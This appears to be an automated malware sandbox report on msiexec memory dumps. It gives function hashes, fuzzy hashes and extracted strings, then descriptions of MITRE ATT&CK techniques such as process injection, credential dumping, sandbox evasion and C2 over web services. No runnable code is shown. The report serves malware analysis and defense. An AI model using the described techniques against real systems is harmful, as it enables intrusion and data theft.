Opcode ID: aa6eb64a0b0769c536528f59f1db176be7e8b213f9b67d26e604263eeac681a0
Instruction ID: 1b90f97b74a6dbfdfd968fd657c18b2120b89b544402d9bbf84a86f41449bf3f
Opcode Fuzzy Hash: aa6eb64a0b0769c536528f59f1db176be7e8b213f9b67d26e604263eeac681a0
Instruction Fuzzy Hash: FFD05E311187440AE345EB34ED55F193A59BBD5306F00C260A0451A95EEFBC580ECF40

Function 00C36748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a911096956fcb4bd440aaab43e8d28f621b9cb22c69e4cb887e3ca090b87ea
Instruction ID: e33273a08c516494c08d20fa115ee42c006f4c49e74029daaff56047ab68d91c
Opcode Fuzzy Hash: 04a911096956fcb4bd440aaab43e8d28f621b9cb22c69e4cb887e3ca090b87ea
Instruction Fuzzy Hash: 9AC012311483084FC549EB69ED95E19371EEFD06147508520B1060655DFF7C5D4A9B90

Non-executed Functions

Function 00C37118 Relevance: 6.6, Strings: 5, Instructions: 350COMMON

Download Yara Rule

Strings

,aq, xrefs: 00C37298
(o]q, xrefs: 00C37220
(o]q, xrefs: 00C37212
,aq, xrefs: 00C3728A
(o]q, xrefs: 00C3753D

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-615190528
Opcode ID: c1436cfbaabf2ea6c2cd39b146d7cbd9a931f4091a79b972b41a855966f13775
Instruction ID: a8df654f54bd3b00050ac232e7cf046ad9278ce9d74bd3ac4103c5a08a742fd9
Opcode Fuzzy Hash: c1436cfbaabf2ea6c2cd39b146d7cbd9a931f4091a79b972b41a855966f13775
Instruction Fuzzy Hash: 1BE15CB0A18119DFCB25CFA9C984AADBBF2BF88300F658255E815AB361D734ED41DF50

Function 26920040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5uq, xrefs: 2692015B

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: a93a8b495a8c45a799cf5dece40875c568966637bf66e1558c7d2cef536995a0
Instruction ID: a422db6136376454cca29638c71d92132bbb13e40804c207f8bfab4cf8963852
Opcode Fuzzy Hash: a93a8b495a8c45a799cf5dece40875c568966637bf66e1558c7d2cef536995a0
Instruction Fuzzy Hash: 6752AB74E01228CFDB64DF65C994BDDBBB2BB89300F1081EAE409AB255DB359E85CF40

Function 26920B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32699bd281ef98e9c6e765f63b76ac80e789537dae211fccd4593386783ebb80
Instruction ID: 19788e22cd889e4852e1a0ff8f09f7b82fa97ebdc5e7badd47509e6ff2b0756f
Opcode Fuzzy Hash: 32699bd281ef98e9c6e765f63b76ac80e789537dae211fccd4593386783ebb80
Instruction Fuzzy Hash: 1C72CD74E01229CFDB65DF69C990BDDBBB2BB49304F1081E9E509AB255DB34AE81CF40

Function 00C3F961 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 977b6b28ba73aee5256d3dce3597e9f6979aa41f9980cd789808a398fbdbdf82
Instruction ID: 23c85ce0b93ea0123f693a03480a90e9d4c33b79e4244d61b19d56c09b66f0e2
Opcode Fuzzy Hash: 977b6b28ba73aee5256d3dce3597e9f6979aa41f9980cd789808a398fbdbdf82
Instruction Fuzzy Hash: 2CC1A074E01218CFDB54DFA5C994B9DBBB2EF89304F2080A9D409AB365DB359E86CF50

Function 2692E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 800f610411a478e137bff713871a67d762dcd32db5794463e41bae074f4f7192
Instruction ID: 33ec115a0dcdd9a36b5d59d53553bf2a37190232b79e0c0483128a19ea3d410f
Opcode Fuzzy Hash: 800f610411a478e137bff713871a67d762dcd32db5794463e41bae074f4f7192
Instruction Fuzzy Hash: F8C1BF74E01218CFDB54DFA5C994B9DBBB6FF89300F2080A9E409AB355DB359A85CF50

Function 2692DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9c8b42309de11039032946147f50ccbaec5d01559c9c1a6b7cea7c2fa1708c7
Instruction ID: 8993c9096df5360595d36842284456441dc4a1429ac740caa7a543740d49ef83
Opcode Fuzzy Hash: e9c8b42309de11039032946147f50ccbaec5d01559c9c1a6b7cea7c2fa1708c7
Instruction Fuzzy Hash: 9DC1BE74E01218CFDB54DFA5C994B9DBBB6EF89300F2080A9E809AB355DB349E85CF50

Function 2692E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae4bfec1b50949f3dd680e12b65573f9a6b5077a0a03d88b40c9b69d8a9a50ab
Instruction ID: 0d8e3056c12c92f7baa2df6466be77fe5332b3363e8de32731771b7ac8803c1a
Opcode Fuzzy Hash: ae4bfec1b50949f3dd680e12b65573f9a6b5077a0a03d88b40c9b69d8a9a50ab
Instruction Fuzzy Hash: 28C1BF74E01218CFDB54DFA5C994B9DBBB6FF89304F2080A9E408AB365DB359A85CF50

Function 2692F3B8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6464eaa223989b104c775440e1d228b69f760b23b7da2dae4aeed6f23088eb7f
Instruction ID: 9704262466b297d4d4575da97ae9aea7876097d12e50c2cb24f913237eb89f6c
Opcode Fuzzy Hash: 6464eaa223989b104c775440e1d228b69f760b23b7da2dae4aeed6f23088eb7f
Instruction Fuzzy Hash: C4C1BF74E01218CFDB54DFA5C994B9DBBB2FF89300F2080A9E409AB365DB359A85CF50

Function 2692EB08 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5857df539d9b953e61d56baaa5fa7462716ceaab7660d91168c3ba6208c77e01
Instruction ID: c2c547eb3cc2a54cd7c0eadf43085355a8a130eb2619263fb67fc1861bf3ff72
Opcode Fuzzy Hash: 5857df539d9b953e61d56baaa5fa7462716ceaab7660d91168c3ba6208c77e01
Instruction Fuzzy Hash: 88C1BF74E01218CFDB54DFA5C994B9DBBB6EF89300F2080A9E409AB365DB349E85CF50

Function 2692EF60 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220842912e64c6c5713471ca90b85b0c776cbb6b69c110c5ceaa0f11eabd8a09
Instruction ID: 422d10c0bdb96f311dc3197556ef0ee904507d5353baa5a60b948120e00ea99c
Opcode Fuzzy Hash: 220842912e64c6c5713471ca90b85b0c776cbb6b69c110c5ceaa0f11eabd8a09
Instruction Fuzzy Hash: 52C1AF74E01218CFDB54DFA5C994B9DBBB2FF89304F2080A9E809AB355DB359A85CF50

Function 2692CCA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab16ca9301b49534eedebca672ec577e412e4810fd83617dbbfafd4fc5a3ded0
Instruction ID: b1066cc1f7f0e2db04c07a130ea40ba6140ab1c690c50c676c0176619fd623a0
Opcode Fuzzy Hash: ab16ca9301b49534eedebca672ec577e412e4810fd83617dbbfafd4fc5a3ded0
Instruction Fuzzy Hash: D6C19F74E01218CFDB54DFA5C954B9DBBB2EF89304F2080A9E809AB365DB359E85CF50

Function 2692D0F8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd543bb11ae53cd0a41f553682b7330f9ee907cf2ebe6d791b194038515e35bd
Instruction ID: 0d46205e1ff75bd05a3b98f9d2061483c72196f3c100722ce88277d933360b7c
Opcode Fuzzy Hash: dd543bb11ae53cd0a41f553682b7330f9ee907cf2ebe6d791b194038515e35bd
Instruction Fuzzy Hash: 2BC19074E01218CFDB54DFA5C954B9DBBB2FF89304F2080A9E409AB3A5DB359A85CF50

Function 2692F810 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83bfaacc6918d480a4706629d8778962ea363eccaf7b26f82794b7bb229cec3
Instruction ID: e7c6a6e1a1de46dc020ad08d88e7330d0397995013d775c86fda2a14925a786e
Opcode Fuzzy Hash: b83bfaacc6918d480a4706629d8778962ea363eccaf7b26f82794b7bb229cec3
Instruction Fuzzy Hash: 89C1AF74E01218CFDB54DFA5C994B9DBBB2FF89304F2080A9E809AB355DB359A85CF50

Function 2692D550 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dcdac26e2277247382866839c5e2e87e41de82043bb5cc02b889235aa909f1d
Instruction ID: 16f7700b00d844144671708929e02cf1a2538e1018002ae96f34755f312cc628
Opcode Fuzzy Hash: 0dcdac26e2277247382866839c5e2e87e41de82043bb5cc02b889235aa909f1d
Instruction Fuzzy Hash: E4C1AF74E01218CFDB54DFA5C994B9DBBB2FF89304F2080A9E409AB355DB359A85CF50

Function 26920673 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb40a190da852931bb234fdd60fc62726bba9ec4a0c20c0c14c23405fb4f9ac
Instruction ID: 6477d05845e51d745a866460212d2eada9e7803c325b8c8b29c355043ab53991
Opcode Fuzzy Hash: adb40a190da852931bb234fdd60fc62726bba9ec4a0c20c0c14c23405fb4f9ac
Instruction Fuzzy Hash: F5A18D74A01228CFDB64DF64C994BEABBB2BF49300F5085EAE40DA7254DB359E81CF51

Function 00C3F2C0 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1e521cb12df006cdcd68637e586604afd98657e4838c2340e2b20abb95a4b9
Instruction ID: bbd5deec3f1d152cbe8a67e09940c4174399ccf2410d6a79fe47e473d5867c55
Opcode Fuzzy Hash: 1b1e521cb12df006cdcd68637e586604afd98657e4838c2340e2b20abb95a4b9
Instruction Fuzzy Hash: 5E511370D15208CBDB04DFA9C894BEEBBB2FB89300F24D529E414BB295DB759986CF50

Function 00C3F4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efe0a98b7b5b4153125315af335424441b624a9fb68f331a021155a27f894a70
Instruction ID: c00c79e3aaa0ac4ae9606a822d85fd06e2e0450633511511650f52674e9e9aca
Opcode Fuzzy Hash: efe0a98b7b5b4153125315af335424441b624a9fb68f331a021155a27f894a70
Instruction Fuzzy Hash: 9351EE70D25208CFDB10DFA8C594BEEBBB2FB49301F209929E419BB295D7759982CF50

Function 26920853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afe106c503a8850cdc514059ab330722592b56f7a67994c83b49f76c68c68cc4
Instruction ID: f612e6df2b4cd079715dfd500caa478ef70855660697d123b79c4de3ff783923
Opcode Fuzzy Hash: afe106c503a8850cdc514059ab330722592b56f7a67994c83b49f76c68c68cc4
Instruction Fuzzy Hash: 53519D74A01228CFCB64DF24C894BEAB7B2FF4A305F5095E9E40AA7254DB359E81CF51

Function 00C376F1 Relevance: 10.5, Strings: 8, Instructions: 469COMMON

Download Yara Rule

Strings

(o]q, xrefs: 00C37C0F
(o]q, xrefs: 00C377E9
,aq, xrefs: 00C37B90
(o]q, xrefs: 00C37815
,aq, xrefs: 00C37BA0
(o]q, xrefs: 00C3772E
(o]q, xrefs: 00C37BFF
(o]q, xrefs: 00C378B2

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
API String ID: 0-1435242062
Opcode ID: 6a4456d3a384c1d11e4c410981575cf31188650286866736464e278de40969f6
Instruction ID: 0d7dc7e17366d00655354b0e71de0c113f15151a1d551d24b9d45783ac69dbf7
Opcode Fuzzy Hash: 6a4456d3a384c1d11e4c410981575cf31188650286866736464e278de40969f6
Instruction Fuzzy Hash: 80126A70A146098FCB24CF69D984EAEBBF2FF49314F148699E459DB2A1DB30ED41CB50

Function 00C329E0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00C32BA4
Xaq, xrefs: 00C32B57
Xaq, xrefs: 00C32AD8
Xaq, xrefs: 00C32A9E

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: add3004778fa146a7db70a493fa1bd08f9b75e4bb5429aa066eab2f97a453a60
Instruction ID: f64dd133dbe34bfe1cf3535764cce64224d863c96d6ffbac63d2dd25be5a4dd0
Opcode Fuzzy Hash: add3004778fa146a7db70a493fa1bd08f9b75e4bb5429aa066eab2f97a453a60
Instruction Fuzzy Hash: A6619231E102198FCF65DFA9C9507AEFBB6BF88300F148565D51AA3351DB348E45CB91

Function 269232F0 Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

Haq, xrefs: 26923476
M, xrefs: 2692336E
Haq, xrefs: 2692333F
Haq, xrefs: 269233DA

Memory Dump Source

Source File: 00000006.00000002.3329523559.0000000026920000.00000040.00000800.00020000.00000000.sdmp, Offset: 26920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_26920000_msiexec.jbxd

Similarity

API ID:
String ID: Haq$Haq$Haq$M
API String ID: 0-3646370482
Opcode ID: dcc88ab4b7e7592c5a6b86dfb6311734a8908c31df8e1d33bf7860e6b13b39ea
Instruction ID: a79e6fdd4ccae1f4c617ff3edefe6e5364640e9db680a1d7917c6639cdec3094
Opcode Fuzzy Hash: dcc88ab4b7e7592c5a6b86dfb6311734a8908c31df8e1d33bf7860e6b13b39ea
Instruction Fuzzy Hash: C851E870E082489FC709DB7488A167D3FB6AF82600F7444EAD507CB69ACD399F46C791

Function 00C32A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

Xaq, xrefs: 00C32BA4
Xaq, xrefs: 00C32B57
Xaq, xrefs: 00C32AD8
Xaq, xrefs: 00C32A9E

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: Xaq$Xaq$Xaq$Xaq
API String ID: 0-4015495023
Opcode ID: 060e7cdf1740cc620e625f10563b83759b2d33f2d6bdfa5f66658b49d2b46e1f
Instruction ID: 6a2ca4f1ef639507abcb4b78aeda1f82119eb3aacf7bcb5754e703df07e9736e
Opcode Fuzzy Hash: 060e7cdf1740cc620e625f10563b83759b2d33f2d6bdfa5f66658b49d2b46e1f
Instruction Fuzzy Hash: D1318F31E1021A8BDF64DE698A8176FF7B6BF94300F244075C42AA7395DB30CE85DB92

Function 00C36920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;]q, xrefs: 00C36952
\;]q, xrefs: 00C36936
\;]q, xrefs: 00C3695E
\;]q, xrefs: 00C3692C

Memory Dump Source

Source File: 00000006.00000002.3309108264.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c30000_msiexec.jbxd

Similarity

API ID:
String ID: \;]q$\;]q$\;]q$\;]q
API String ID: 0-2351511683
Opcode ID: 26f4a160c291be54f846343adcaff102f6c7be152948e10dbbc47404d220176f
Instruction ID: 75cfc3d49979b600cbcfd3809bf59838b07bfae9e868bce7414073a8a39d5048
Opcode Fuzzy Hash: 26f4a160c291be54f846343adcaff102f6c7be152948e10dbbc47404d220176f
Instruction Fuzzy Hash: 3B01F231760304AFC764CE2DC580B2577EABF88B60B25C46AE456CB374DA31DC41CB40

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
